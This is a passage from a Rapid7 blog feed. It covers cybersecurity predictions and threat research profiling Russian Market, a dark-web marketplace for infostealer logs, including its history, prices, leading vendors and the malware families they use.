private-sector organizations that play vital roles in supply chains, energy, finance, and healthcare. Critical infrastructure is increasingly vulnerable to disruptive attacks that can cause cascading impacts across borders.</span></p><h3><span style='color:rgb(102, 102, 102);'>What to expect in the coming years </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Cyberattacks are expected to become increasingly sophisticated and closely coordinated with physical and economic pressure campaigns, further blurring the boundaries between cybercrime, espionage, and warfare. Attacks targeting critical infrastructure, especially in the energy, communications, healthcare, and food supply sectors, will rise in frequency and scale. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Attribution will become even more challenging as state actors leverage proxy groups, artificial intelligence, and advanced obfuscation tactics. The growth of “cyber privateering” (state-sanctioned criminal operations) and hacktivists' involvement in state-sponsored conflicts will also accelerate.</span></p><h3><span style='color:rgb(102, 102, 102);'>How to anticipate and respond</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Public and private organizations must recognize that geopolitical cyber risks are not isolated to governments or the defense sector. According to the </span><a href="https://www.weforum.org/stories/2025/02/biggest-cybersecurity-threats-2025/#:~:text=Supply%20chain%20concerns:%2054%25%20of,in%20their%20current%20team's%20capabilities."><span style='font-size: undefined;'>World Economic Forum’s</span></a><span style='font-size: undefined;'> Global Cybersecurity Outlook 2025, nearly 60% of organizations acknowledge that geopolitical tensions are shaping and influencing their cybersecurity strategies. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Proactive engagement with national cyber defense agencies, information sharing with industry consortia, and participation in public-private threat intelligence platforms are crucial for timely awareness of emerging geopolitical threats. Developing and regularly exercising incident response and crisis management plans for large-scale, coordinated attacks will build organizational resilience. Supply chain risk management must be prioritized, with continuous vetting of vendors and partners for exposure to state-sponsored threats. Enhanced monitoring for advanced persistent threats (APTs), investment in network segmentation, and adopting zero-trust architectures will help contain and mitigate breaches. Strategic board-level engagement and scenario planning, including tabletop exercises focused on hybrid warfare scenarios, are essential to ensure readiness.</span></p><h2>Regulatory and cybersecurity governance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The regulatory landscape governing cybersecurity is rapidly evolving in response to escalating threats and high-profile breaches. The convergence of privacy, security, and ethical considerations, particularly with the proliferation of AI and IoT, complicates compliance and risk management. With diverging standards, cross-border data flow restrictions, and conflicting regulatory frameworks, international fragmentation persists, making global compliance a daunting challenge for multinational organizations. Regulatory enforcement is becoming more aggressive, with significant penalties for non-compliance, while boards and executives face growing personal liability for cybersecurity failures. Amid this complexity, many organizations struggle with inadequate governance structures, unclear roles and responsibilities, and insufficient board oversight, exposing them to regulatory and operational risks.</span></p><h3><span style='color:rgb(102, 102, 102);'>What to expect in the coming years </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Regulation will intensify, becoming more prescriptive, real-time, and enforcement-heavy, especially following major cyber incidents or data leaks. AI-specific regulations, including rules on explainability, data provenance, and model risk, will emerge globally but may be fragmented. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In some regions, boards will face an expanding set of cybersecurity obligations. Expect new mandates around quantum-readiness, breach reporting within hours, and mandatory transparency on incidents. Directors and executives will also face increasing personal accountability for managing cyber risk. Cross-border data transfer rules will get stricter, and fines for non-compliance will rise. The regulatory “patchwork” will persist, driving demand for compliance automation, continuous monitoring, and legal-technical teams that can interpret requirements in near real time. Expect attempts at harmonization, but persistent regional and sectoral differences will make this difficult, especially due to the differences in what the rationale is for these requirements in the first place.</span></p><h3><span style='color:rgb(102, 102, 102);'>How to anticipate and respond</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations must adopt a holistic and adaptive approach to cybersecurity governance, elevating it to a board-level priority. Establishing clear accountability for cybersecurity, ensuring executive engagement, and integrating cybersecurity into enterprise risk management frameworks are foundational steps. Compliance programs must be continuously updated to keep pace with evolving regulations across the organization's jurisdictions. Leveraging automation and advanced analytics can streamline compliance monitoring, reporting, and audit processes. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Engagement with policymakers, industry groups, and regulatory bodies can provide insight into forthcoming regulatory trends and help shape practical, effective standards. Cross-functional collaboration, bridging security, legal, privacy, and risk management teams, is essential for cohesive governance and rapid response to regulatory changes. Investment in third-party risk management, privacy-enhancing technologies, and continuous board education on cybersecurity will position organizations to meet compliance obligations and demonstrate resilience and accountability in the face of growing regulatory scrutiny.</span></p><h2 style="direction: ltr;">Human resilience at the heart of cybersecurity strategy</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Despite the proliferation of advanced technologies, the human factor remains the most persistent vulnerability in cybersecurity. Phishing, social engineering, insider threats, and inadvertent errors continue to account for most breaches, underscoring the limits of purely technical defenses. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The accelerating pace of digital transformation, remote and hybrid work, and the blurring of personal and professional digital boundaries introduce new vectors for exploitation. Employee burnout, security fatigue, and a global shortage of skilled cybersecurity professionals further compound the challenge, leaving organizations struggling to maintain effective vigilance. Meanwhile, adversaries target organizational life's psychological and emotional dimensions, exploiting fear, uncertainty, urgency to bypass controls. Culture, leadership, and trust are increasingly recognized as critical determinants of cyber resilience, with organizations that foster a strong security culture and adaptive workforce proving better able to anticipate, withstand, and recover from attacks.</span></p><h3><span style='color:rgb(102, 102, 102);'>What to expect in the coming years </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The human attack surface will expand as attackers use AI-driven psychometrics and real-time social engineering to exploit individuals. Burnout and security fatigue will reach crisis levels as change intensifies, making staff errors more likely. Insider threats, including unintentional ones, will increase, especially with workforce churn and hybrid work. New generations of immersive, scenario-based training and AI-powered “cyber coaches” will emerge. Organizations will recognize mental health as a cyber risk factor, investing in support, flexibility, and well-being as a core part of security. Expect growing demand for cross-disciplinary cyber talent, “cyber ambassadors” within business units, and leadership development to foster resilience and trust.</span></p><h3><span style='color:rgb(102, 102, 102);'>How to anticipate and respond</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Building human resilience must be at the core of organizational cybersecurity strategy for the coming years. This requires moving beyond checkbox compliance and one-off training to a continuous, context-aware, and engaging security awareness program tailored to the organization’s evolving threat profile. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Leaders must cultivate a culture of shared responsibility, openness, and psychological safety, encouraging employees to report incidents and near-misses without fear of reprisal. Investing in mental health and well-being programs can help mitigate burnout and improve decision-making under stress. Recruitment and retention strategies should prioritize diversity, inclusion, and upskilling to build a dynamic, resilient security team capable of addressing new and unexpected threats. Scenario-based training, immersive simulations, and red team exercises can develop adaptive thinking and crisis management skills at all levels. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Ultimately, organizations that empower their people, invest in leadership development, and integrate human resilience into their broader risk management frameworks will be best positioned to thrive amid an unpredictable cyber threat landscape.</span></p><h2 style="direction: ltr;">Future outlook: building cyber resilience</h2><p style="direction: ltr;"><span style='font-size: undefined;'>In the next 3 to 5 years, the cybersecurity landscape will be marked by an unprecedented convergence of emerging technologies, regulatory shifts, and global instability. The rise of AI-powered attacks, the imminent threat and potential promise of quantum computing, and the weaponization of disinformation amid rising geopolitical tensions promise to transform cyber risk from an IT concern into a fundamental business issue. Traditional reactive measures will prove obsolete as malicious actors become more sophisticated, exploiting automation, deepfakes, supply chain vulnerabilities, and ever-expanding attack surfaces. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Boards and organizational leaders must radically rethink their approach, shifting from compliance-driven programs to ones focused on continuous risk anticipation and strategic resilience. This requires investing in adaptive security architectures, AI-powered threat intelligence, and quantum-resistant cryptography while upskilling employees and establishing a culture of widespread cyber vigilance. Proactive collaboration with regulators, industry consortia, and competitors will be essential to shape common defenses and keep pace with rapidly evolving standards. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By making cybersecurity a driver of innovation rather than just a cost item, organizations can seize new opportunities, protect their critical assets, and build lasting trust with their customers and stakeholders. The organizations that thrive will view cyber resilience as vital to their agility and sustainability, thereby transforming potential threats into catalysts for strategic advantage in an increasingly volatile digital age.</span></p><p><span style='font-size: undefined;'><strong>Want more insights and strategies to help your security team stay resilient in 2026 and beyond? </strong></span><a href="https://www.brighttalk.com/webcast/10457/654458?utm_source=Rapid7&amp;utm_medium=brighttalk&amp;utm_campaign=654458?utm_source=blog&amp;utm_medium=webcast&amp;utm_content=top-cybersecurity-predictions-2026-webinar-blog-promo&amp;utm_campaign=global-pla-2025-q4-global-webinar-prospect-eng"><span style='font-size: undefined;'><strong>Join us</strong></span></a><span style='font-size: undefined;'><strong> for Rapid7’s annual cybersecurity predictions webinar. </strong></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/it-key-emerging-cybersecurity-threats-challenges-ai-ransomware-quantum</link>
      <guid isPermaLink="false">bltb32ea7fa374cd84c</guid>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Ransomware]]></category>
      <category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Jeremy Makowski]]></dc:creator>
      <pubDate>Tue, 28 Oct 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebc2810157aecfaf/68af2715c53b04810df94abb/blog-hero-generic-pixel.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Inside Russian Market: Uncovering the Botnet Empire]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'><em>Eliran Alon contributed to this post.</em></span></p><h2>Inside Russian Market: Key insights from Rapid7 threat research</h2><p><span style='font-size: undefined;'>The online cybercrime marketplace, Russian Market, has evolved from selling Remote Desktop Protocol (RDP) access to becoming one of the most active underground hubs for information-stealing malware logs, where stolen user credentials are traded daily. Each compromised login represents a potential gateway into corporate systems, enabling threat actors to launch credential-based attacks that put businesses, governments, and individuals at risk of account compromise and follow-on cyberattacks. Notably, several high-profile breaches have been traced back to credentials purchased on marketplaces like Russian Market—demonstrating how a single exposed password can lead to significant data loss, financial damage, and reputational harm.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The growing demand for stolen credentials is fueled by widespread campaigns that deploy information-stealing malware, infecting employees both in the office and at home, and silently harvesting logins that may already be circulating underground. This reality significantly raises the likelihood of corporate credentials being exposed, making monitoring for stolen employee logins essential. Russian Market, however, is a gated community that employs anti-scraping measures, creating substantial challenges for defenders trying to track stolen data. By profiling key vendors and malware variants, our research provides a rare inside look at Russian Market’s operations, underscoring why organizations must act now to strengthen credential monitoring and enhance detection capabilities.</span></p><h3><span style='font-size: undefined;'>Russian Market at a glance:</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Russian Market has evolved its operations over time, shifting from selling RDP access to stolen credit card data and, more recently, infostealer logs, in a strategic pivot toward more scalable and potentially lucrative offerings.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Stolen credentials originate from organizations worldwide, with 26% originating in the US and 23% in Argentina.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Over 180,000 infostealer logs were offered for sale in the first half of 2025, with the marketplace largely dominated by three key vendors: Nu####ez, bl####ow, and Mo####yf.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Most sellers have adopted a multi-stealer approach over the years, leveraging various malware variants in their operations, with Lumma emerging as a widely used tool.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The most common types of infostealers being used by sellers in Russian Market over the years have been Raccoon, Vidar, Lumma, RedLine, and Stealc, with Rhadamanthys and Acreed gaining popularity in the first half of 2025. </span></p></li></ul><h2>How information-stealing malware fuels the underground economy</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Information-stealing malware remain among the most persistent threats in today’s cyberthreat landscape, enabling threat actors to extract sensitive credentials and pave the way for high-impact cyberattacks. Credentials harvested through these infostealers are frequently traded on deep and dark web marketplaces, where cybercriminals connect to buy and sell access to compromised accounts and systems.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Among these illicit platforms, the cybercrime marketplace, Russian Market, stands out as one of the most active and enduring. Every day, hundreds of infostealer logs with stolen credentials are put up for sale, fueling a thriving underground economy. Unlike other cybercrime forums and marketplaces, such as BreachForums and XSS, that have been disrupted in recent years, Russian Market has maintained a steady presence since its emergence in early 2020.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This article examines the evolution and current operations of Russian Market, shedding light on its most prolific sellers and assessing its influence within the broader cybercrime ecosystem.</span></p><h2>Russian Market and the dark web economy</h2><p style="direction: ltr;"><span style='font-size: undefined;'>With an average of approximately 30,000 “bots” offered for sale each month in the first half of 2025, Russian Market has established itself as the leading cybercrime marketplace for stolen credentials. Its portfolio, however, has evolved significantly over the years, as the platform has undergone multiple transformations since its emergence in the cybercrime ecosystem. Below is a brief overview of these changes:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>2020 – 2024 | RDP Access Sales</strong></span><br/><span style='font-size: undefined;'>At its inception, Russian Market specialized in selling Remote Desktop Protocol (RDP) access and login credentials to compromised computers. Such access was frequently exploited for ransomware deployment, cyberespionage, or as a launchpad for further attacks from seemingly legitimate systems. From 2020 until the service was discontinued in January 2024, RDP access was commoditized and widely traded within the cybercrime economy.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>2021 – Present | Credit Card Offering</strong></span><br/><span style='font-size: undefined;'>In 2021, Russian Market shifted its focus and rapidly emerged as a dominant player in the stolen credit card trade. Driven by an aggressive expansion strategy and a prevailing sense of impunity, the platform grew quickly, at its peak overshadowing other carding forums and marketplaces.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Late 2021 – Present | The Credentials Era</strong></span><br/><span style='font-size: undefined;'>Later in 2021, Russian Market launched a new product line: </span><span style='font-size: undefined;'><em>“Bots.”</em></span><span style='font-size: undefined;'> These are not traditional botnets of infected devices, but rather data logs exfiltrated from compromised machines, typically using information-stealing malware (</span><span style='font-size: undefined;'><em>“infostealers”</em></span><span style='font-size: undefined;'>). Each bot typically contains:</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Cookies</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Credentials</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Autofill data</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Session tokens</span></p></li></ul></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Today, beyond the sheer volume of its offerings, a defining feature that distinguishes Russian Market from competitors is its usability. Within the “Logs” section, buyers can filter results by geography, operating system, infostealer, and vendor to identify bots relevant to their needs quickly. Additionally, the “links” field enables searches for bots containing credentials tied to specific domains or even individual email addresses (Figure 1).</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdbfcd93ed822597f/68e687b6c43e2f98697bda45/Figure_1.png" height="543" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_1.png" asset-alt="Figure_1.png" width="724" max-width="724" max-height="543" style="max-width: 724px; width: 724px; max-height: 543px; height: 543px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdbfcd93ed822597f/68e687b6c43e2f98697bda45/Figure_1.png" data-sys-asset-uid="bltdbfcd93ed822597f" data-sys-asset-filename="Figure_1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_1.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'><em>Figure 1 - List of bots for sale on Russian Market</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'>While the associated geographies differ in breadth, the bots predominantly contain credentials for users in the United States, with Argentina and Brazil following. This distribution further reflects the global spread of infostealer infections (Figure 2).</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbdad17bf1865cadb/68e68938f0b3bd8302593075/Figure_2_V2.png" height="412" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_2_V2.png" asset-alt="Figure_2_V2.png" width="720" max-width="720" max-height="412" style="max-width: 720px; width: 720px; max-height: 412px; height: 412px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbdad17bf1865cadb/68e68938f0b3bd8302593075/Figure_2_V2.png" data-sys-asset-uid="bltbdad17bf1865cadb" data-sys-asset-filename="Figure_2_V2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_2_V2.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'><em>Figure 2 - 20 most targeted countries by bot count</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'>It should be noted that each bot typically contains credentials for multiple domains. The number of credentials is often correlated with the bot’s size, with larger bots generally storing more data. In the first half of 2025, bot sizes ranged from 0.05 to 0.3 megabytes, with an average size of 0.14 megabytes. Figure 3 below represents the 30 most common bot sizes in descending order per bot count.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt94f780cfce5ce8f3/68e68938758f5b4594d9e5b6/Figure_3_V3.png" height="412" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_3_V3.png" asset-alt="Figure_3_V3.png" width="720" max-width="720" max-height="412" style="max-width: 720px; width: 720px; max-height: 412px; height: 412px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt94f780cfce5ce8f3/68e68938758f5b4594d9e5b6/Figure_3_V3.png" data-sys-asset-uid="blt94f780cfce5ce8f3" data-sys-asset-filename="Figure_3_V3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_3_V3.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'><em>Figure 3 - Bot size distribution</em></span></p><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'>In the first half of 2025, bots were typically listed for sale on Russian Market at around $10, a price that remained consistent across vendors. Historically, however, bot prices on the marketplace have ranged from $1 to $100, depending on factors such as geolocation, browser session quality, and the validity of login data.</span></p><h2>Key vendors behind Russian Market's botnet empire</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Despite the large number of bots available for sale on Russian Market, the marketplace is dominated by just a few sellers. Since bots were first introduced in 2021, three vendors, operating under the aliases Mo####yf, de####nt, and Nu####ez, have been responsible for nearly 70% of all detected bot listings (Table 1).</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdb831ab7a62451bc/68e6893955fd274f60d8ad66/Table_1_V2.png" height="413" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Table_1_V2.png" asset-alt="Table_1_V2.png" width="721" max-width="721" max-height="413" style="max-width: 721px; width: 721px; max-height: 413px; height: 413px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdb831ab7a62451bc/68e6893955fd274f60d8ad66/Table_1_V2.png" data-sys-asset-uid="bltdb831ab7a62451bc" data-sys-asset-filename="Table_1_V2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Table_1_V2.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Table 1 - Top sellers per market share</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>While Mo####yf and Nu####ez continued to hold a strong presence on Russian Market in the first half of 2025, de####nt’s market share plummeted to just 0.23%. At the time of writing, no bots are attributed to this seller, suggesting they were likely banned or removed from the platform (Figure 4). Such removals are not unusual, as administrators of dark web marketplaces frequently restrict or expel members who appear to violate platform rules.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcafd18f04decf0cf/68e687b532b3a97aaff21703/Figure_4.png" height="273" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_4.png" asset-alt="Figure_4.png" width="724" max-width="724" max-height="273" style="max-width: 724px; width: 724px; max-height: 273px; height: 273px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcafd18f04decf0cf/68e687b532b3a97aaff21703/Figure_4.png" data-sys-asset-uid="bltcafd18f04decf0cf" data-sys-asset-filename="Figure_4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_4.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 4 - Search results for de####nt</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>In the first half of 2025, new sellers using the aliases bl####ow, sm####ez, and co####er gained prominence on Russian Market (Figure 5). During this period, Nu####ez remained the leading vendor with a 38% market share, followed by bl####ow at 24% and Mo####yf at 19%. It is worth noting that the activity levels of all sellers, even the most dominant, fluctuated from month to month (Figure 6).</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd649beaba635a7d8/68e689387173c483c8eb8af2/Figure_5_V2.png" height="415" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_5_V2.png" asset-alt="Figure_5_V2.png" width="725" max-width="725" max-height="415" style="max-width: 725px; width: 725px; max-height: 415px; height: 415px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd649beaba635a7d8/68e689387173c483c8eb8af2/Figure_5_V2.png" data-sys-asset-uid="bltd649beaba635a7d8" data-sys-asset-filename="Figure_5_V2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_5_V2.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 5 - Bot count per seller</em></span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdcc114e253bb59e7/68e68938c124d37b3a05cb2c/Figure_6_V2.png" height="420" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_6_V2.png" asset-alt="Figure_6_V2.png" width="730" max-width="730" max-height="420" style="max-width: 730px; width: 730px; max-height: 420px; height: 420px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdcc114e253bb59e7/68e68938c124d37b3a05cb2c/Figure_6_V2.png" data-sys-asset-uid="bltdcc114e253bb59e7" data-sys-asset-filename="Figure_6_V2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_6_V2.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 6 - Seller’s monthly activity</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Reputation, a critical trust-building mechanism across cybercrime platforms, also plays a central role in Russian Market. The marketplace implements a structured reputational system designed to assess the perceived reliability of vendors, despite their reliance on pseudonymous aliases. Each seller is assigned a numerical score calculated from two primary factors: the volume of items offered for sale and the feedback provided by buyers following transactions. This score is then aggregated into an overall vendor rating on a five-point scale, complemented by a tiered status system. Vendors exceeding a score of 10,000 are assigned a “Diamond” status, while those below this threshold are designated “Platinum.” Such reputation tiers not only influence buyer trust and purchasing decisions but also serve as a competitive differentiator among sellers, incentivizing sustained activity and positive feedback generation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Each of the prominent vendors in the first half of 2025, namely Nu####ez, bl####ow, Mo####yf, sm####ez, and co####er, is presented further in more detail.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Nu####ez</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since at least January 2024, Nu####ez currently holds a “Diamond” status with an overall score of 4.41 (Figure 7). In 2025, the vendor was observed leveraging multiple infostealers, primarily Lumma, Rhadamanthys, and Acreed, to harvest credentials. Previously, in 2024, Nu####ez had relied on Vidar and Stealc. The consistent use of diverse infostealers, combined with the vendor’s heightened activity, indicates an intent to sustain and expand offerings despite fluctuations in infostealer availability, such as those caused by law enforcement disruptions. This behavior may also reflect deliberate experimentation, allowing Nu####ez to evaluate and compare the effectiveness of different infostealers in terms of output and reliability.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta690dae0c0185a3a/68e687b59975a5019197a30e/Figure_7.png" height="389" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_7.png" asset-alt="Figure_7.png" width="360" max-width="360" max-height="389" style="max-width: 360px; width: 360px; max-height: 389px; height: 389px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta690dae0c0185a3a/68e687b59975a5019197a30e/Figure_7.png" data-sys-asset-uid="blta690dae0c0185a3a" data-sys-asset-filename="Figure_7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_7.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 7 - Nu####ez’s profile on Russian Market</em></span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>bl####ow </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since at least October 2024, bl####ow currently holds a “Diamond” status with an overall score of 4.78 (Figure 8). In contrast to vendors such as Nu####ez, who diversify their operations across multiple infostealers, bl####ow appears to rely exclusively on Lumma for credential harvesting. While this heavy dependence on one malware variant makes bl####ow potentially susceptible to disruptions, the vendor’s heightened activity in 2025 suggests that Lumma has thus far demonstrated resilience and operational consistency.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c0dbec0d8dbda33/68e687b5c7f3775c743fb3e7/Figure_8.png" height="396" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_8.png" asset-alt="Figure_8.png" width="359" max-width="359" max-height="396" style="max-width: 359px; width: 359px; max-height: 396px; height: 396px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c0dbec0d8dbda33/68e687b5c7f3775c743fb3e7/Figure_8.png" data-sys-asset-uid="blt3c0dbec0d8dbda33" data-sys-asset-filename="Figure_8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_8.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 8 - bl####ow’s profile on Russian Market</em></span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Mo####yf </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since at least April 2023, Mo####yf currently holds a “Diamond” status with an overall score of 4.50 (Figure 9). Initially, the vendor appears to have offered credit card data, but later shifted their attention to bot sales, which remained their primary focus. In 2025, Mo####yf primarily relied on Lumma for credential harvesting, while in 2024, the vendor had utilized Stealc and Vidar. This shift in tooling indicates a flexible and adaptive approach to infostealer selection, likely driven by factors such as performance, reliability, and operational efficiency.</span></p><p style="text-align: left;direction: ltr;">⠀⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9923f568898a92ae/68e687b6c2504ec9dd1fe8a6/Figure_9.png" height="379" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_9.png" asset-alt="Figure_9.png" width="359" max-width="359" max-height="379" style="max-width: 359px; width: 359px; max-height: 379px; height: 379px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9923f568898a92ae/68e687b6c2504ec9dd1fe8a6/Figure_9.png" data-sys-asset-uid="blt9923f568898a92ae" data-sys-asset-filename="Figure_9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_9.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 9 - Mo####yf’s profile on Russian Market</em></span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>sm####ez</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since at least July 2023, sm####ez currently holds a “Diamond” status with an overall score of 4.48 (Figure 10). In 2025, the vendor primarily relied on Lumma for credential harvesting, whereas in 2024, they employed a combination of Vidar, RedLine, and Stealc. This multi-stealer approach likely enabled sm####ez to evaluate and compare the performance of different tools before settling on Lumma as the primary infostealer. The use of multiple infostealers and the resulting variability in operational outcomes likely contributed to fluctuations in user feedback during that period.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6184212bab4ed720/68e687b54f6743d3644773d5/Figure_10.png" height="412" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_10.png" asset-alt="Figure_10.png" width="360" max-width="360" max-height="412" style="max-width: 360px; width: 360px; max-height: 412px; height: 412px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6184212bab4ed720/68e687b54f6743d3644773d5/Figure_10.png" data-sys-asset-uid="blt6184212bab4ed720" data-sys-asset-filename="Figure_10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_10.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 10 - sm####ez’s profile</em></span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>co####er</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since at least January 2025, co####er currently holds a “Platinum” status with an overall score of 4.38 (Figure 11). The vendor primarily relies on Lumma for credential harvesting, though Stealc has also been used in select cases. 